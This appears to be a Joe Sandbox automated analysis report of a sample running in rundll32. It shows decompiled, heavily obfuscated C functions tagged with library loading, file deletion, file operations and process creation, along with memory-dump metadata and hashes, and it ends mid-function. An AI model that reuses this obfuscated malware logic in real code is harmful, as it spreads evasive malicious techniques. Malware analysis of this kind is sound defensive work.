0x00297026
0x00297032
0x00297037
0x0029703b
0x00297045
0x00297051
0x00297056
0x0029705c
0x00297064
0x0029706c
0x00297074
0x0029707c
0x00297084
0x0029708c
0x00297094
0x0029709f
0x002970a7
0x002970b2
0x002970ba
0x002970c2
0x002970ca
0x002970d2
0x002970da
0x002970df
0x002970e4
0x002970e9
0x002970f1
0x002970fc
0x00297107
0x00297112
0x0029711a
0x00297122
0x00297127
0x0029712f
0x0029713b
0x00297140
0x00297146
0x0029714e
0x00297156
0x00297162
0x00297167
0x0029716d
0x0029717d
0x00297185
0x0029718d
0x00297196
0x0029719b
0x002971a5
0x002971aa
0x002971b0
0x002971b8
0x002971c0
0x002971c8
0x002971d0
0x002971d8
0x002971e0
0x002971ec
0x002971ef
0x002971f3
0x002971fb
0x00297203
0x0029720b
0x00297215
0x0029721b
0x00297228
0x00297230
0x0029723b
0x0029723c
0x00297240
0x00297248
0x00297250
0x00297258
0x0029725d
0x00297265
0x0029726d
0x00297275
0x0029727d
0x00297285
0x0029728a
0x00297292
0x0029729a
0x002972a2
0x002972aa
0x002972b2
0x002972c5
0x002972c9
0x002972d0
0x002972db
0x002972e6
0x002972f1
0x002972fc
0x00297304
0x00297312
0x00297316
0x0029731e
0x00297330
0x0029748b
0x00297494
0x0029749c
0x002974ab
0x002974d0
0x002974d5
0x002974e9
0x002974f0
0x00000000
0x00297336
0x0029733c
0x00297473
0x0029747a
0x0029747f
0x00000000
0x00297342
0x00297344
0x002973ef
0x00297401
0x0029740c
0x0029741a
0x00297421
0x00297428
0x0029742f
0x00297438
0x0029743f
0x00297446
0x0029744d
0x00297454
0x0029745b
0x0029745f
0x00297461
0x00297464
0x00000000
0x0029734a
0x00297350
0x002973da
0x002973e1
0x00000000
0x00297352
0x00297358
0x002973bd
0x00000000
0x0029735a
0x00297360
0x00297521
0x00297521
0x00297527
0x00000000
0x00000000
0x00297366
0x002973a3
0x002973a8
0x002973aa
0x002973b0
0x002973b6
0x00000000
0x002973b6
0x002973b0
0x00297360
0x00297358
0x00297350
0x00297344
0x0029733c
0x00297539
0x00297539
0x00297514
0x00297519
0x0029751c
0x00000000

Strings

A], xrefs: 00296FBD
RC%, xrefs: 002972D0
ff, xrefs: 00297094
0713-1255), xrefs: 0029751C, 00297521
J5, xrefs: 00296F84
-7x4, xrefs: 00297006
}t, xrefs: 00296F05

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: A]$-7x4$0713-1255)$J5$RC%$ff$}t
API String ID: 0-2433233330
Opcode ID: 10f8e56243f6033a5a97682f6462c1cbb29f258c4b333b14d6201a95f5867ad8
Instruction ID: 48c6a36ca8df6add1547d4d805a3a20e69ea0c7ec0a1e7512c62e943693df459
Opcode Fuzzy Hash: 10f8e56243f6033a5a97682f6462c1cbb29f258c4b333b14d6201a95f5867ad8
Instruction Fuzzy Hash: D2F1227151D3809FE368CF65C98A64BBBE2FBC4758F108A1DF199862A0D7B58918CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00294121, Relevance: 2.6, Strings: 2, Instructions: 88
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00294121(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t102;
				intOrPtr _t107;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;

				_v8 = 0xd482;
				_v8 = _v8 | 0x3f4d3094;
				_v8 = _v8 >> 0xf;
				_t122 = 0x6c;
				_v8 = _v8 / _t122;
				_v8 = _v8 ^ 0x00002ebf;
				_v16 = 0x9738;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x38240ed5;
				_v16 = _v16 ^ 0x38246a1a;
				_v12 = 0xd145;
				_t123 = 0x79;
				_v12 = _v12 / _t123;
				_v12 = _v12 ^ 0x5b70918a;
				_v12 = _v12 ^ 0x5b70dd81;
				_v32 = 0x9c6c;
				_t124 = 0x4f;
				_v32 = _v32 / _t124;
				_v32 = _v32 ^ 0x00007668;
				_v24 = 0xe988;
				_v24 = _v24 ^ 0x7e4bafdf;
				_t125 = 0x30;
				_v24 = _v24 / _t125;
				_v24 = _v24 ^ 0x02a1b82f;
				_v28 = 0xa7de;
				_v28 = _v28 + 0xf9c8;
				_v28 = _v28 ^ 0x0001fb4a;
				_v20 = 0x96ad;
				_v20 = _v20 << 2;
				_v20 = _v20 | 0xda18e41e;
				_v20 = _v20 ^ 0xda1afe0b;
				_v44 = 0x693f;
				_v44 = _v44 << 0xf;
				_v44 = _v44 ^ 0x349fb644;
				_v40 = 0x60cb;
				_v40 = _v40 * 0x1b;
				_v40 = _v40 ^ 0x000a5dc2;
				_v36 = 0xaf25;
				_v36 = _v36 | 0x497a0d1f;
				_v36 = _v36 ^ 0x497a9209;
				_push(_v12);
				_push(_v16);
				_t102 = E002A7998(_v32, _v28, _v20, E00296ABA(_v8, __ecx, _v36));
				_t107 =  *0x2b0720; // 0x339f70
				 *((intOrPtr*)(_t107 + 0x1c + __edx * 4)) = _t102;
				return E0029F935(_v44, _t101, _v40, _v36);
			}

0x00294127
0x0029412e
0x00294135
0x00294144
0x00294149
0x0029414e
0x00294155
0x0029415c
0x00294160
0x00294167
0x0029416e
0x00294178
0x0029417d
0x00294182
0x00294189
0x00294190
0x0029419a
0x0029419f
0x002941a4
0x002941ab
0x002941b2
0x002941bc
0x002941c1
0x002941c4
0x002941cb
0x002941d2
0x002941d9
0x002941e0
0x002941e7
0x002941eb
0x002941f2
0x002941f9
0x00294200
0x00294204
0x0029420b
0x00294216
0x00294219
0x00294220
0x00294227
0x0029422e
0x00294235
0x00294238
0x00294252
0x00294257
0x00294265
0x00294279

Strings

?i, xrefs: 002941F9
hv, xrefs: 002941A4

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ?i$hv
API String ID: 1029625771-2289810265
Opcode ID: 96a9f4d7e18df312a3af989c81437c37a12612f26d7552423be2e72431b340e1
Instruction ID: 111d11201be085781414d38bc600373ffff05dbefa43de4d0cf1f69d82c08ff8
Opcode Fuzzy Hash: 96a9f4d7e18df312a3af989c81437c37a12612f26d7552423be2e72431b340e1
Instruction Fuzzy Hash: 2D41E372D01219EBDF08DFA5C94A4EEBFB2FB44314F208099D511BB250C7790A16DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00296C05, Relevance: 1.4, Strings: 1, Instructions: 117
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00296C05(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v588;
				void* _t124;
				void* _t142;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t124);
				_v56 = _v56 & 0x00000000;
				_v68 = 0x42b1ea;
				_v64 = 0x415067;
				_v60 = 0x957a2;
				_v48 = 0xfe39;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x000061d4;
				_v32 = 0x6515;
				_v32 = _v32 + 0xffff65f3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xf2c232dd;
				_v28 = 0x14e5;
				_v28 = _v28 + 0xffff19be;
				_t144 = 0xd;
				_v28 = _v28 * 0x4b;
				_v28 = _v28 ^ 0xffc2f25e;
				_v24 = 0xe4e1;
				_v24 = _v24 * 0x6e;
				_v24 = _v24 | 0x8d7bef82;
				_v24 = _v24 ^ 0x8d7baf1f;
				_v40 = 0xb91c;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x00004e56;
				_v8 = 0xcb46;
				_v8 = _v8 + 0xe648;
				_v8 = _v8 / _t144;
				_t145 = 0x55;
				_v8 = _v8 * 0x19;
				_v8 = _v8 ^ 0x00031206;
				_v16 = 0x65f6;
				_v16 = _v16 << 3;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x0ff0f14b;
				_v16 = _v16 ^ 0x9828a994;
				_v52 = 0x8105;
				_v52 = _v52 + 0xffffd602;
				_v52 = _v52 ^ 0x00007212;
				_v12 = 0x703c;
				_v12 = _v12 | 0xf2e8f3d1;
				_v12 = _v12 / _t145;
				_v12 = _v12 + 0xffffb4c1;
				_v12 = _v12 ^ 0x02db00eb;
				_v36 = 0x1bb4;
				_t146 = 0x33;
				_v36 = _v36 / _t146;
				_v36 = _v36 + 0xffffa3a3;
				_v36 = _v36 ^ 0xffffa330;
				_v44 = 0x1dab;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x00001da0;
				_v20 = 0x2eda;
				_v20 = _v20 >> 6;
				_t147 = 0x2d;
				_v20 = _v20 / _t147;
				_v20 = _v20 << 0xc;
				_v20 = _v20 ^ 0x00006d08;
				_push(_v28);
				_push(_v32);
				E002962BE(_v24, _v20, _v48, E00296ABA(_v48, 0x2af960, _v20), _v40, _v8, _v16,  &_v588);
				E0029F935(_v52, _t137, _v12, _v36);
				_t142 = E00298289(_v44, _v20,  &_v588); // executed
				return _t142;
			}

0x00296c0f
0x00296c12
0x00296c15
0x00296c18
0x00296c19
0x00296c1a
0x00296c1f
0x00296c25
0x00296c2c
0x00296c33
0x00296c3a
0x00296c41
0x00296c45
0x00296c4c
0x00296c53
0x00296c5a
0x00296c5e
0x00296c65
0x00296c6c
0x00296c79
0x00296c7c
0x00296c7f
0x00296c86
0x00296c91
0x00296c94
0x00296c9b
0x00296ca2
0x00296ca9
0x00296cad
0x00296cb4
0x00296cbb
0x00296cc9
0x00296cd0
0x00296cd3
0x00296cd6
0x00296cdd
0x00296ce4
0x00296ce8
0x00296cec
0x00296cf3
0x00296cfa
0x00296d01
0x00296d08
0x00296d0f
0x00296d16
0x00296d24
0x00296d27
0x00296d2e
0x00296d35
0x00296d3f
0x00296d44
0x00296d49
0x00296d50
0x00296d57
0x00296d5e
0x00296d62
0x00296d69
0x00296d70
0x00296d77
0x00296d7a
0x00296d7d
0x00296d81
0x00296d8d
0x00296d90
0x00296db8
0x00296dc8
0x00296dda
0x00296de6

Strings

gPA, xrefs: 00296C2C

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: gPA
API String ID: 4033686569-163129573
Opcode ID: bd50fe73c9e40a0e33c8f143bc325afbd8276c778e1db053c9e7a7bf9acac53e
Instruction ID: 9979e492c20ff8798d6531f5df9ddf3383ec84a2534dff345be51dd7229512ad
Opcode Fuzzy Hash: bd50fe73c9e40a0e33c8f143bc325afbd8276c778e1db053c9e7a7bf9acac53e
Instruction Fuzzy Hash: 5051FDB1D0021EABDF59CFE1C94A8DEBBB2FF48304F108159E415BA2A0D7B90A55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002A533C, Relevance: .2, Instructions: 195
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E002A533C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				short _v104;
				char* _v108;
				char* _v112;
				signed int _v116;
				char _v120;
				char _v640;
				char _v1160;
				void* _t215;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t286;
				void* _t288;

				_push(_a12);
				_t288 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t215);
				_v56 = 0x4114;
				_v56 = _v56 | 0xd79a36e6;
				_v56 = _v56 << 0xd;
				_v56 = _v56 ^ 0x4efec001;
				_v64 = 0xe772;
				_t253 = 0x5d;
				_t286 = 0x1e;
				_v64 = _v64 * 0x37;
				_v64 = _v64 | 0x782e01af;
				_v64 = _v64 ^ 0x783fbfeb;
				_v24 = 0x1663;
				_v24 = _v24 + 0xffff4539;
				_v24 = _v24 | 0x3b21799f;
				_v24 = _v24 + 0xffff660d;
				_v24 = _v24 ^ 0xfffee9ac;
				_v84 = 0x1aa0;
				_v84 = _v84 + 0x58c;
				_v84 = _v84 ^ 0x0000229a;
				_v68 = 0x1abd;
				_v68 = _v68 + 0xffff4a9c;
				_v68 = _v68 ^ 0xffff75a0;
				_v12 = 0x1160;
				_v12 = _v12 + 0x1485;
				_v12 = _v12 | 0x93f7c04c;
				_v12 = _v12 / _t253;
				_v12 = _v12 ^ 0x01973c3e;
				_v40 = 0x5b40;
				_v40 = _v40 | 0x500fbdd2;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x403fa886;
				_v28 = 0x9d09;
				_v28 = _v28 + 0x469b;
				_v28 = _v28 / _t286;
				_t254 = 0x76;
				_v28 = _v28 / _t254;
				_v28 = _v28 ^ 0x000007b0;
				_v80 = 0xaed2;
				_t255 = 0x3c;
				_v80 = _v80 / _t255;
				_v80 = _v80 ^ 0x00003a2b;
				_v60 = 0x4b88;
				_v60 = _v60 << 0xd;
				_v60 = _v60 + 0x2f84;
				_v60 = _v60 ^ 0x097109d3;
				_v44 = 0xf066;
				_v44 = _v44 << 1;
				_v44 = _v44 | 0x79c2caa0;
				_v44 = _v44 ^ 0x79c3ebd7;
				_v88 = 0x2259;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0x00005b17;
				_v48 = 0x7ba5;
				_v48 = _v48 ^ 0xc5fa1dbc;
				_v48 = _v48 + 0xb2f6;
				_v48 = _v48 ^ 0xc5fb5f44;
				_v36 = 0x1361;
				_t256 = 0x7a;
				_v36 = _v36 / _t256;
				_v36 = _v36 + 0xffff0da4;
				_v36 = _v36 ^ 0xffff698e;
				_v52 = 0x5b77;
				_v52 = _v52 + 0xfffffc2c;
				_t257 = 0xf;
				_v52 = _v52 * 0x11;
				_v52 = _v52 ^ 0x0005c2cd;
				_v8 = 0x4bf1;
				_v8 = _v8 ^ 0x1795dc61;
				_v8 = _v8 | 0x7024afad;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x5bfbd5d8;
				_v20 = 0x719e;
				_v20 = _v20 * 0x29;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x0efce61c;
				_v20 = _v20 ^ 0x0efcce1e;
				_v16 = 0xe06f;
				_v16 = _v16 ^ 0xda05f8ae;
				_t258 = 0x4e;
				_v16 = _v16 / _t257;
				_v16 = _v16 / _t258;
				_v16 = _v16 ^ 0x002fa3ed;
				_v72 = 0xf23d;
				_v72 = _v72 | 0x6e9f03b3;
				_v72 = _v72 ^ 0x6e9ff6ff;
				_v32 = 0x326;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x59ad8c35;
				_v32 = _v32 + 0xa07d;
				_v32 = _v32 ^ 0x59ae2262;
				_v76 = 0xb356;
				_v76 = _v76 + 0xfded;
				_v76 = _v76 ^ 0x00018886;
				E0029614B(_t286, _v84, _v68,  &_v120, _v12, _v40);
				E0029614B(0x208, _v28, _v80,  &_v640, _v60, _v44);
				E0029614B(0x208, _v88, _v48,  &_v1160, _v36, _v52);
				E0029E056(_t288, _v8,  &_v640, _v20);
				E0029E056(_a12, _v16,  &_v1160, _v72);
				_v116 = _v56;
				_v112 =  &_v640;
				_v108 =  &_v1160;
				_v104 = _v24 | _v64;
				_t249 = E00293296( &_v120, _v32, _v76); // executed
				asm("sbb eax, eax");
				return  ~_t249 + 1;
			}

0x002a5347
0x002a534a
0x002a534c
0x002a534f
0x002a5352
0x002a5353
0x002a5354
0x002a5359
0x002a5362
0x002a5369
0x002a536d
0x002a5374
0x002a5381
0x002a5384
0x002a5385
0x002a5388
0x002a538f
0x002a5396
0x002a539d
0x002a53a4
0x002a53ab
0x002a53b2
0x002a53b9
0x002a53c0
0x002a53c7
0x002a53ce
0x002a53d5
0x002a53dc
0x002a53e3
0x002a53ea
0x002a53f1
0x002a53ff
0x002a5402
0x002a5409
0x002a5410
0x002a5417
0x002a541b
0x002a5422
0x002a5429
0x002a5437
0x002a543f
0x002a5444
0x002a5449
0x002a5450
0x002a545a
0x002a545d
0x002a5460
0x002a5467
0x002a546e
0x002a5472
0x002a5479
0x002a5480
0x002a5487
0x002a548a
0x002a5491
0x002a5498
0x002a549f
0x002a54a3
0x002a54aa
0x002a54b1
0x002a54b8
0x002a54bf
0x002a54c6
0x002a54d4
0x002a54d9
0x002a54de
0x002a54e5
0x002a54ec
0x002a54f3
0x002a54fe
0x002a5501
0x002a5504
0x002a550b
0x002a5512
0x002a5519
0x002a5520
0x002a5524
0x002a552b
0x002a5536
0x002a5539
0x002a553d
0x002a5544
0x002a554b
0x002a5552
0x002a555e
0x002a555f
0x002a556b
0x002a5571
0x002a5578
0x002a557f
0x002a5586
0x002a558d
0x002a5594
0x002a5598
0x002a559f
0x002a55a6
0x002a55ad
0x002a55b4
0x002a55bb
0x002a55cf
0x002a55ee
0x002a5608
0x002a561f
0x002a5634
0x002a563f
0x002a5648
0x002a5651
0x002a5660
0x002a5664
0x002a566e
0x002a5676

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: b2a93879ec820d1ff31a157181e2dd8f3b847cc0af111d2069ac158cf62ac511
Instruction ID: 5e0d741f803909aa3ac87a52c872e1582645525465a5ff4080d8ce402f291c9e
Opcode Fuzzy Hash: b2a93879ec820d1ff31a157181e2dd8f3b847cc0af111d2069ac158cf62ac511
Instruction Fuzzy Hash: 67A10EB1D0020DEBDF18CFA5D98A8DEBBB1FF44304F208159E516BA2A0D7B85A56CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002A4DAD, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E002A4DAD(void* __edx, void* __eflags) {
				void* _t169;
				void* _t182;
				void* _t183;
				signed int _t187;
				signed int _t188;
				intOrPtr _t203;
				int _t206;
				void* _t209;
				void* _t210;

				_t209 = _t210 - 0x58;
				_push( *((intOrPtr*)(_t209 + 0x7c)));
				_t203 =  *((intOrPtr*)(_t209 + 0x74));
				_push( *((intOrPtr*)(_t209 + 0x78)));
				_push(_t203);
				_push( *((intOrPtr*)(_t209 + 0x70)));
				_push( *((intOrPtr*)(_t209 + 0x6c)));
				_push( *((intOrPtr*)(_t209 + 0x68)));
				_push( *((intOrPtr*)(_t209 + 0x64)));
				_push( *((intOrPtr*)(_t209 + 0x60)));
				_push(__edx);
				_push(0);
				E0029E171(_t169);
				 *(_t209 + 0xc) =  *(_t209 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t209 + 4)) = 0x2a14a3;
				 *((intOrPtr*)(_t209 + 8)) = 0x424fb2;
				 *(_t209 + 0x10) = 0x85df;
				 *(_t209 + 0x10) =  *(_t209 + 0x10) + 0xbd54;
				 *(_t209 + 0x10) =  *(_t209 + 0x10) ^ 0x0001069e;
				 *(_t209 + 0x44) = 0xf66e;
				 *(_t209 + 0x44) =  *(_t209 + 0x44) | 0xcf2fe6de;
				 *(_t209 + 0x44) =  *(_t209 + 0x44) << 0x10;
				 *(_t209 + 0x44) =  *(_t209 + 0x44) ^ 0xf6fe6db5;
				 *(_t209 + 0x4c) = 0xb9d3;
				_t187 = 0x5c;
				 *(_t209 + 0x4c) =  *(_t209 + 0x4c) * 0x52;
				 *(_t209 + 0x4c) =  *(_t209 + 0x4c) | 0xd92cbe36;
				 *(_t209 + 0x4c) =  *(_t209 + 0x4c) + 0xf2c1;
				 *(_t209 + 0x4c) =  *(_t209 + 0x4c) ^ 0xd940e3ca;
				 *(_t209 + 0x2c) = 0xb180;
				 *(_t209 + 0x2c) =  *(_t209 + 0x2c) << 0xf;
				 *(_t209 + 0x2c) =  *(_t209 + 0x2c) ^ 0x58c064f7;
				 *(_t209 + 0x18) = 0x5c95;
				 *(_t209 + 0x18) =  *(_t209 + 0x18) + 0xffffee37;
				 *(_t209 + 0x18) =  *(_t209 + 0x18) ^ 0x00000875;
				 *(_t209 + 0x34) = 0xfb6e;
				 *(_t209 + 0x34) =  *(_t209 + 0x34) | 0x6a88fc3f;
				 *(_t209 + 0x34) =  *(_t209 + 0x34) + 0xdefe;
				 *(_t209 + 0x34) =  *(_t209 + 0x34) ^ 0x6a89a390;
				 *(_t209 + 0x14) = 0x3097;
				 *(_t209 + 0x14) =  *(_t209 + 0x14) / _t187;
				 *(_t209 + 0x14) =  *(_t209 + 0x14) ^ 0x00006c9d;
				 *(_t209 + 0x20) = 0xae6e;
				 *(_t209 + 0x20) =  *(_t209 + 0x20) | 0x83ed0308;
				 *(_t209 + 0x20) =  *(_t209 + 0x20) ^ 0x83ed961e;
				 *(_t209 + 0x54) = 0xb611;
				 *(_t209 + 0x54) =  *(_t209 + 0x54) ^ 0xe19b12be;
				 *(_t209 + 0x54) =  *(_t209 + 0x54) ^ 0x64a716fe;
				 *(_t209 + 0x54) =  *(_t209 + 0x54) | 0x404434be;
				 *(_t209 + 0x54) =  *(_t209 + 0x54) ^ 0xc57ca194;
				 *(_t209 + 0x3c) = 0xa831;
				 *(_t209 + 0x3c) =  *(_t209 + 0x3c) ^ 0x88a1b475;
				 *(_t209 + 0x3c) =  *(_t209 + 0x3c) | 0x5f877e13;
				 *(_t209 + 0x3c) =  *(_t209 + 0x3c) ^ 0xdfa722d7;
				 *(_t209 + 0x38) = 0x80de;
				 *(_t209 + 0x38) =  *(_t209 + 0x38) + 0x9624;
				 *(_t209 + 0x38) =  *(_t209 + 0x38) + 0xffff5876;
				 *(_t209 + 0x38) =  *(_t209 + 0x38) ^ 0x000063a6;
				 *(_t209 + 0x40) = 0x8b06;
				 *(_t209 + 0x40) =  *(_t209 + 0x40) | 0x52320dbf;
				 *(_t209 + 0x40) =  *(_t209 + 0x40) + 0x274;
				 *(_t209 + 0x40) =  *(_t209 + 0x40) ^ 0x5232a3fd;
				 *(_t209 + 0x28) = 0x4700;
				 *(_t209 + 0x28) =  *(_t209 + 0x28) + 0xc3f6;
				 *(_t209 + 0x28) =  *(_t209 + 0x28) ^ 0x000140d0;
				 *(_t209 + 0x50) = 0x4baa;
				_t188 = 0x18;
				 *(_t209 + 0x50) =  *(_t209 + 0x50) / _t188;
				 *(_t209 + 0x50) =  *(_t209 + 0x50) >> 0xd;
				 *(_t209 + 0x50) =  *(_t209 + 0x50) + 0xffff18f4;
				 *(_t209 + 0x50) =  *(_t209 + 0x50) ^ 0xffff49f9;
				 *(_t209 + 0x1c) = 0x2f8;
				 *(_t209 + 0x1c) =  *(_t209 + 0x1c) + 0xf5bb;
				 *(_t209 + 0x1c) =  *(_t209 + 0x1c) ^ 0x0000a6a2;
				 *(_t209 + 0x24) = 0x3302;
				 *(_t209 + 0x24) =  *(_t209 + 0x24) << 0xa;
				 *(_t209 + 0x24) =  *(_t209 + 0x24) ^ 0x00cc7b83;
				 *(_t209 + 0x48) = 0xf27b;
				 *(_t209 + 0x48) =  *(_t209 + 0x48) * 0x23;
				 *(_t209 + 0x48) =  *(_t209 + 0x48) << 0xf;
				 *(_t209 + 0x48) =  *(_t209 + 0x48) ^ 0x7a7c1591;
				 *(_t209 + 0x48) =  *(_t209 + 0x48) ^ 0xe914bc4c;
				 *(_t209 + 0x30) = 0x88b0;
				 *(_t209 + 0x30) =  *(_t209 + 0x30) * 0x2c;
				 *(_t209 + 0x30) =  *(_t209 + 0x30) | 0xc324f320;
				 *(_t209 + 0x30) =  *(_t209 + 0x30) ^ 0xc337c250;
				_push( *(_t209 + 0x2c));
				_push( *(_t209 + 0x4c));
				_push(_t209 - 0x50);
				_push( *(_t209 + 0x44));
				_t206 = 0x44;
				_t189 = _t206;
				E0029614B(_t206,  *(_t209 + 0x10));
				 *((intOrPtr*)(_t209 - 0x50)) = _t206;
				_t182 = E002A8165( *((intOrPtr*)(_t209 + 0x64)),  *((intOrPtr*)(_t209 + 0x6c)),  *(_t209 + 0x18), _t209 - 0x50, _t206, _t189,  *((intOrPtr*)(_t209 + 0x60)),  *(_t209 + 0x34),  *(_t209 + 0x14), _t189,  *(_t209 + 0x20), _t189, _t209 - 0xc,  *(_t209 + 0x54), _t189,  *(_t209 + 0x3c)); // executed
				if(_t182 == 0) {
					_t183 = 0;
				} else {
					if(_t203 == 0) {
						E002A0DE5( *(_t209 + 0x38),  *(_t209 + 0x28),  *((intOrPtr*)(_t209 - 0xc)),  *(_t209 + 0x50));
						E002A0DE5( *(_t209 + 0x1c),  *(_t209 + 0x48),  *((intOrPtr*)(_t209 - 8)),  *(_t209 + 0x30));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t183 = 1;
				}
				return _t183;
			}

0x002a4dae
0x002a4dba
0x002a4dbd
0x002a4dc0
0x002a4dc3
0x002a4dc4
0x002a4dc7
0x002a4dca
0x002a4dcd
0x002a4dd0
0x002a4dd3
0x002a4dd4
0x002a4dd6
0x002a4ddb
0x002a4de1
0x002a4de8
0x002a4def
0x002a4df6
0x002a4dfd
0x002a4e04
0x002a4e0b
0x002a4e12
0x002a4e16
0x002a4e1d
0x002a4e2a
0x002a4e2d
0x002a4e30
0x002a4e37
0x002a4e3e
0x002a4e45
0x002a4e4c
0x002a4e50
0x002a4e57
0x002a4e5e
0x002a4e65
0x002a4e6c
0x002a4e73
0x002a4e7a
0x002a4e81
0x002a4e88
0x002a4e96
0x002a4e99
0x002a4ea0
0x002a4ea7
0x002a4eae
0x002a4eb5
0x002a4ebc
0x002a4ec3
0x002a4eca
0x002a4ed1
0x002a4ed8
0x002a4edf
0x002a4ee6
0x002a4eed
0x002a4ef4
0x002a4efb
0x002a4f02
0x002a4f09
0x002a4f10
0x002a4f17
0x002a4f1e
0x002a4f25
0x002a4f2c
0x002a4f33
0x002a4f3a
0x002a4f41
0x002a4f4b
0x002a4f4e
0x002a4f51
0x002a4f55
0x002a4f5c
0x002a4f63
0x002a4f6a
0x002a4f71
0x002a4f78
0x002a4f7f
0x002a4f83
0x002a4f8a
0x002a4f95
0x002a4f98
0x002a4f9c
0x002a4fa3
0x002a4faa
0x002a4fb5
0x002a4fbb
0x002a4fc2
0x002a4fc9
0x002a4fcc
0x002a4fcf
0x002a4fd0
0x002a4fd8
0x002a4fd9
0x002a4fdb
0x002a4fe9
0x002a500e
0x002a5018
0x002a5057
0x002a501a
0x002a501c
0x002a5039
0x002a504d
0x002a501e
0x002a5021
0x002a5022
0x002a5023
0x002a5024
0x002a5024
0x002a5027
0x002a5027
0x002a505f

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b8f435794ee632d023b3443c338b4b810899f4716f7f4b55c577918be4a60593
Instruction ID: 86902ea55677eb3b16da80d2ed58a7d59954d336f979c33bb17409305ea3581b
Opcode Fuzzy Hash: b8f435794ee632d023b3443c338b4b810899f4716f7f4b55c577918be4a60593
Instruction Fuzzy Hash: 2981F17141024CABDF59CFA4C94A9DE3FA1FF58354F008218FE15961A0D7BAC9A5DF80

Uniqueness

Uniqueness Score: -1.00%

Function 10005838, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E10005838(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t57;
				intOrPtr* _t59;
